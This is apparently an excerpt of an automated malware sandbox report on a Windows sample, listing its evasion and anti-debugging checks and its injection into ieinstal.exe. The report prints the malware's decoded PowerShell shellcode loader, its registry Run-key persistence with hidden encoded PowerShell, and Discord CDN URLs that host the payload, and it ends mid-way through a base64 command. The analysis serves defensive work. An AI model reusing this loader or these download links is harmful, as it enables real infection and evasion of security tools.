Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6220 Thread sleep count: 8962 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4240 Thread sleep count: 7408 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4156 Thread sleep count: 42 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 756 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7208 Thread sleep count: 7572 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1520 Thread sleep time: -922337203685477s >= -30000s
Sleep loop found (likely to delay execution)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread sleep count: Count: 9857 delay: -5 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ginqqgem.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rf0jcwxf.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wxgbxjsa.dll Jump to dropped file
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC19E5 rdtsc 25_2_08FC19E5
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8403 Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Window / User API: threadDelayed 9857 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7803 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8962
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7408
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7572
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: ModuleInformation Jump to behavior
Source: powershell.exe, 00000004.00000002.397162677750.000000000B2B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398157984214.000000000B109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.398588592506.000000000B149000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: powershell.exe, 00000004.00000002.397162677750.000000000B2B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398157984214.000000000B109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.398588592506.000000000B149000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000019.00000002.398155865635.00000000092B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe<
Source: powershell.exe, 0000001A.00000002.398579916323.00000000085B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe\
Source: powershell.exe, 0000001A.00000002.398588592506.000000000B149000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: powershell.exe, 00000004.00000002.397162677750.000000000B2B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398157984214.000000000B109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.398588592506.000000000B149000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: ieinstal.exe, 00000011.00000002.401407177634.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: user32ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=Software\Microsoft\Windows\CurrentVersion\RunMaaneds3\IMG_25254535627256.jpghttps://cdn.discordapp.com/attachments/933089228261294143/933089306719961188/IMG_25254535627256.jpgSOFTWARE\AppDataLow\Billiond5c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $OBITUARY=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Billiond5;powershell.exe -windowstyle hidden -encodedcommand($OBITUARY)https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bin
Source: powershell.exe, 00000004.00000002.397162677750.000000000B2B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398157984214.000000000B109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.398588592506.000000000B149000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: ieinstal.exe, 0000001E.00000002.398101781286.0000000003590000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398544109967.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: user32ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=Software\Microsoft\Windows\CurrentVersion\RunMaaneds3https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bin
Source: powershell.exe, 00000019.00000002.398153960658.0000000008EE0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: user32ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=ProgramFiles=\internet explorer\ieinstal.exewindir=\syswow64\mshtml.tlbProgramFiles=\internet explorer\ieinstal.exewindir=\syswow64\mshtml.tlb
Source: powershell.exe, 00000004.00000002.397162677750.000000000B2B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398157984214.000000000B109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.398588592506.000000000B149000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: powershell.exe, 0000001A.00000002.398588592506.000000000B149000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: ieinstal.exe, ieinstal.exe, 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000002.401403794938.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001E.00000002.398100301334.00000000032E0000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001E.00000002.398098354584.0000000003248000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398541662516.00000000035E8000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398543567080.0000000003690000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398542601563.000000000362B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000004.00000002.397151721605.0000000008334000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exent
Source: ieinstal.exe, 0000001E.00000002.398100301334.00000000032E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWk7
Source: ieinstal.exe, 00000011.00000002.401407177634.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398153960658.0000000008EE0000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001E.00000002.398101781286.0000000003590000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398544109967.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: powershell.exe, 00000004.00000002.397162677750.000000000B2B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398157984214.000000000B109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.398588592506.000000000B149000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000004.00000002.397162677750.000000000B2B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398157984214.000000000B109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.398588592506.000000000B149000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: powershell.exe, 00000004.00000002.397162677750.000000000B2B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398157984214.000000000B109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.398588592506.000000000B149000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 0000001A.00000002.398588592506.000000000B149000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread information set: HideFromDebugger
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC19E5 rdtsc 25_2_08FC19E5
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC1DE5 mov eax, dword ptr fs:[00000030h] 25_2_08FC1DE5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC58C5 mov eax, dword ptr fs:[00000030h] 25_2_08FC58C5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC58C2 mov eax, dword ptr fs:[00000030h] 25_2_08FC58C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC5046 mov eax, dword ptr fs:[00000030h] 25_2_08FC5046
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC3B43 mov eax, dword ptr fs:[00000030h] 25_2_08FC3B43
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC2530 mov eax, dword ptr fs:[00000030h] 25_2_08FC2530
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC4D30 mov eax, dword ptr fs:[00000030h] 25_2_08FC4D30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_03092530 mov eax, dword ptr fs:[00000030h] 30_2_03092530
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_03091DE5 mov eax, dword ptr fs:[00000030h] 30_2_03091DE5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_03094D30 mov eax, dword ptr fs:[00000030h] 30_2_03094D30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_03093B43 mov eax, dword ptr fs:[00000030h] 30_2_03093B43
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_03095046 mov eax, dword ptr fs:[00000030h] 30_2_03095046
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_030958C2 mov eax, dword ptr fs:[00000030h] 30_2_030958C2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_030958C5 mov eax, dword ptr fs:[00000030h] 30_2_030958C5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_03232530 mov eax, dword ptr fs:[00000030h] 33_2_03232530
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_03231DE5 mov eax, dword ptr fs:[00000030h] 33_2_03231DE5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_03234D30 mov eax, dword ptr fs:[00000030h] 33_2_03234D30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_03233B43 mov eax, dword ptr fs:[00000030h] 33_2_03233B43
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_03235046 mov eax, dword ptr fs:[00000030h] 33_2_03235046
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_032358C2 mov eax, dword ptr fs:[00000030h] 33_2_032358C2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_032358C5 mov eax, dword ptr fs:[00000030h] 33_2_032358C5
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 17_2_00A56511 Sleep,LdrInitializeThunk,NtProtectVirtualMemory, 17_2_00A56511
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_030928EC RtlAddVectoredExceptionHandler,NtProtectVirtualMemory, 30_2_030928EC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_032328EC RtlAddVectoredExceptionHandler,NtProtectVirtualMemory, 33_2_032328EC

HIPS / PFW / Operating System Protection Evasion
barindex
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: A50000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 3090000
Encrypted powershell cmdline option found
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded #erhvervsku Lejesvende9 Archai8 Sags droshkiesh landska witchbel Hydrant Scullsba airburstu retributo dagpaafu UPTHR morpionf Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class SYDYEMENIT1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int SYDYEMENIT6,ref Int32 Natur9,int seru,ref Int32 SYDYEMENIT,int adju,int SYDYEMENIT7);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(uint seru5,int seru6,int seru7,int seru8,int seru9);[DllImport("kernel32.dll")]public static extern void RtlMoveMemory(IntPtr seru1,ref Int32 seru2,int seru3);}"@#fern CAMPHIRE FJEDREN CAPSICIN Scarfedent Inte9 AZYM FIGUR Afgiftsn3 unthornl Sauss3 NOLE Heedlessb MINERA Vinddrevet OPHIDIO MAGNETISE galv miltenes XENO Alle5 nonmonist $SYDYEMENIT3=0;$SYDYEMENIT9=1048576;$SYDYEMENIT8=[SYDYEMENIT1]::NtAllocateVirtualMemory(-1,[ref]$SYDYEMENIT3,0,[ref]$SYDYEMENIT9,12288,64)$Stenf=(Get-ItemProperty -Path "HKCU:\Software\Clip").One$TALAR = [System.Byte[]]::CreateInstance([System.Byte],$Stenf.Length / 2)For($i=0; $i -lt $Stenf.Length; $i+=2){ $TALAR[$i/2] = [convert]::ToByte($Stenf.Substring($i, 2), 16) }for($Lykkedrmb=0; $Lykkedrmb -lt $TALAR.count ; $Lykkedrmb++){[SYDYEMENIT1]::RtlMoveMemory($SYDYEMENIT3+$Lykkedrmb,[ref]$TALAR[$Lykkedrmb],1)}[SYDYEMENIT1]::CallWindowProcW($SYDYEMENIT3, 0,0,0,0)
Source: unknown Process created: Base64 decoded v,K+9nZ)Jt^W{v,)^']zs!5E^rQ#M`iZ.Ybwy^W{v,)^']zwr^u&8PX
Source: unknown Process created: Base64 decoded v,K+9nZ)Jt^W{v,)^']zs!5E^rQ#M`iZ.Ybwy^W{v,)^']zwr^u&8PX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Base64 decoded #erhvervsku Lejesvende9 Archai8 Sags droshkiesh landska witchbel Hydrant Scullsba airburstu retributo dagpaafu UPTHR morpionf Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class SYDYEMENIT1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int SYDYEMENIT6,ref Int32 Natur9,int seru,ref Int32 SYDYEMENIT,int adju,int SYDYEMENIT7);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(uint seru5,int seru6,int seru7,int seru8,int seru9);[DllImport("kernel32.dll")]public static extern void RtlMoveMemory(IntPtr seru1,ref Int32 seru2,int seru3);}"@#fern CAMPHIRE FJEDREN CAPSICIN Scarfedent Inte9 AZYM FIGUR Afgiftsn3 unthornl Sauss3 NOLE Heedlessb MINERA Vinddrevet OPHIDIO MAGNETISE galv miltenes XENO Alle5 nonmonist $SYDYEMENIT3=0;$SYDYEMENIT9=1048576;$SYDYEMENIT8=[SYDYEMENIT1]::NtAllocateVirtualMemory(-1,[ref]$SYDYEMENIT3,0,[ref]$SYDYEMENIT9,12288,64)$Stenf=(Get-ItemProperty -Path "HKCU:\Software\Clip").One$TALAR = [System.Byte[]]::CreateInstance([System.Byte],$Stenf.Length / 2)For($i=0; $i -lt $Stenf.Length; $i+=2){ $TALAR[$i/2] = [convert]::ToByte($Stenf.Substring($i, 2), 16) }for($Lykkedrmb=0; $Lykkedrmb -lt $TALAR.count ; $Lykkedrmb++){[SYDYEMENIT1]::RtlMoveMemory($SYDYEMENIT3+$Lykkedrmb,[ref]$TALAR[$Lykkedrmb],1)}[SYDYEMENIT1]::CallWindowProcW($SYDYEMENIT3, 0,0,0,0)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Base64 decoded #erhvervsku Lejesvende9 Archai8 Sags droshkiesh landska witchbel Hydrant Scullsba airburstu retributo dagpaafu UPTHR morpionf Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class SYDYEMENIT1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int SYDYEMENIT6,ref Int32 Natur9,int seru,ref Int32 SYDYEMENIT,int adju,int SYDYEMENIT7);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(uint seru5,int seru6,int seru7,int seru8,int seru9);[DllImport("kernel32.dll")]public static extern void RtlMoveMemory(IntPtr seru1,ref Int32 seru2,int seru3);}"@#fern CAMPHIRE FJEDREN CAPSICIN Scarfedent Inte9 AZYM FIGUR Afgiftsn3 unthornl Sauss3 NOLE Heedlessb MINERA Vinddrevet OPHIDIO MAGNETISE galv miltenes XENO Alle5 nonmonist $SYDYEMENIT3=0;$SYDYEMENIT9=1048576;$SYDYEMENIT8=[SYDYEMENIT1]::NtAllocateVirtualMemory(-1,[ref]$SYDYEMENIT3,0,[ref]$SYDYEMENIT9,12288,64)$Stenf=(Get-ItemProperty -Path "HKCU:\Software\Clip").One$TALAR = [System.Byte[]]::CreateInstance([System.Byte],$Stenf.Length / 2)For($i=0; $i -lt $Stenf.Length; $i+=2){ $TALAR[$i/2] = [convert]::ToByte($Stenf.Substring($i, 2), 16) }for($Lykkedrmb=0; $Lykkedrmb -lt $TALAR.count ; $Lykkedrmb++){[SYDYEMENIT1]::RtlMoveMemory($SYDYEMENIT3+$Lykkedrmb,[ref]$TALAR[$Lykkedrmb],1)}[SYDYEMENIT1]::CallWindowProcW($SYDYEMENIT3, 0,0,0,0)
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded #erhvervsku Lejesvende9 Archai8 Sags droshkiesh landska witchbel Hydrant Scullsba airburstu retributo dagpaafu UPTHR morpionf Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class SYDYEMENIT1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int SYDYEMENIT6,ref Int32 Natur9,int seru,ref Int32 SYDYEMENIT,int adju,int SYDYEMENIT7);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(uint seru5,int seru6,int seru7,int seru8,int seru9);[DllImport("kernel32.dll")]public static extern void RtlMoveMemory(IntPtr seru1,ref Int32 seru2,int seru3);}"@#fern CAMPHIRE FJEDREN CAPSICIN Scarfedent Inte9 AZYM FIGUR Afgiftsn3 unthornl Sauss3 NOLE Heedlessb MINERA Vinddrevet OPHIDIO MAGNETISE galv miltenes XENO Alle5 nonmonist $SYDYEMENIT3=0;$SYDYEMENIT9=1048576;$SYDYEMENIT8=[SYDYEMENIT1]::NtAllocateVirtualMemory(-1,[ref]$SYDYEMENIT3,0,[ref]$SYDYEMENIT9,12288,64)$Stenf=(Get-ItemProperty -Path "HKCU:\Software\Clip").One$TALAR = [System.Byte[]]::CreateInstance([System.Byte],$Stenf.Length / 2)For($i=0; $i -lt $Stenf.Length; $i+=2){ $TALAR[$i/2] = [convert]::ToByte($Stenf.Substring($i, 2), 16) }for($Lykkedrmb=0; $Lykkedrmb -lt $TALAR.count ; $Lykkedrmb++){[SYDYEMENIT1]::RtlMoveMemory($SYDYEMENIT3+$Lykkedrmb,[ref]$TALAR[$Lykkedrmb],1)}[SYDYEMENIT1]::CallWindowProcW($SYDYEMENIT3, 0,0,0,0) Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Base64 decoded #erhvervsku Lejesvende9 Archai8 Sags droshkiesh landska witchbel Hydrant Scullsba airburstu retributo dagpaafu UPTHR morpionf Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class SYDYEMENIT1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int SYDYEMENIT6,ref Int32 Natur9,int seru,ref Int32 SYDYEMENIT,int adju,int SYDYEMENIT7);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(uint seru5,int seru6,int seru7,int seru8,int seru9);[DllImport("kernel32.dll")]public static extern void RtlMoveMemory(IntPtr seru1,ref Int32 seru2,int seru3);}"@#fern CAMPHIRE FJEDREN CAPSICIN Scarfedent Inte9 AZYM FIGUR Afgiftsn3 unthornl Sauss3 NOLE Heedlessb MINERA Vinddrevet OPHIDIO MAGNETISE galv miltenes XENO Alle5 nonmonist $SYDYEMENIT3=0;$SYDYEMENIT9=1048576;$SYDYEMENIT8=[SYDYEMENIT1]::NtAllocateVirtualMemory(-1,[ref]$SYDYEMENIT3,0,[ref]$SYDYEMENIT9,12288,64)$Stenf=(Get-ItemProperty -Path "HKCU:\Software\Clip").One$TALAR = [System.Byte[]]::CreateInstance([System.Byte],$Stenf.Length / 2)For($i=0; $i -lt $Stenf.Length; $i+=2){ $TALAR[$i/2] = [convert]::ToByte($Stenf.Substring($i, 2), 16) }for($Lykkedrmb=0; $Lykkedrmb -lt $TALAR.count ; $Lykkedrmb++){[SYDYEMENIT1]::RtlMoveMemory($SYDYEMENIT3+$Lykkedrmb,[ref]$TALAR[$Lykkedrmb],1)}[SYDYEMENIT1]::CallWindowProcW($SYDYEMENIT3, 0,0,0,0) Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Base64 decoded #erhvervsku Lejesvende9 Archai8 Sags droshkiesh landska witchbel Hydrant Scullsba airburstu retributo dagpaafu UPTHR morpionf Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class SYDYEMENIT1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int SYDYEMENIT6,ref Int32 Natur9,int seru,ref Int32 SYDYEMENIT,int adju,int SYDYEMENIT7);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(uint seru5,int seru6,int seru7,int seru8,int seru9);[DllImport("kernel32.dll")]public static extern void RtlMoveMemory(IntPtr seru1,ref Int32 seru2,int seru3);}"@#fern CAMPHIRE FJEDREN CAPSICIN Scarfedent Inte9 AZYM FIGUR Afgiftsn3 unthornl Sauss3 NOLE Heedlessb MINERA Vinddrevet OPHIDIO MAGNETISE galv miltenes XENO Alle5 nonmonist $SYDYEMENIT3=0;$SYDYEMENIT9=1048576;$SYDYEMENIT8=[SYDYEMENIT1]::NtAllocateVirtualMemory(-1,[ref]$SYDYEMENIT3,0,[ref]$SYDYEMENIT9,12288,64)$Stenf=(Get-ItemProperty -Path "HKCU:\Software\Clip").One$TALAR = [System.Byte[]]::CreateInstance([System.Byte],$Stenf.Length / 2)For($i=0; $i -lt $Stenf.Length; $i+=2){ $TALAR[$i/2] = [convert]::ToByte($Stenf.Substring($i, 2), 16) }for($Lykkedrmb=0; $Lykkedrmb -lt $TALAR.count ; $Lykkedrmb++){[SYDYEMENIT1]::RtlMoveMemory($SYDYEMENIT3+$Lykkedrmb,[ref]$TALAR[$Lykkedrmb],1)}[SYDYEMENIT1]::CallWindowProcW($SYDYEMENIT3, 0,0,0,0)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAd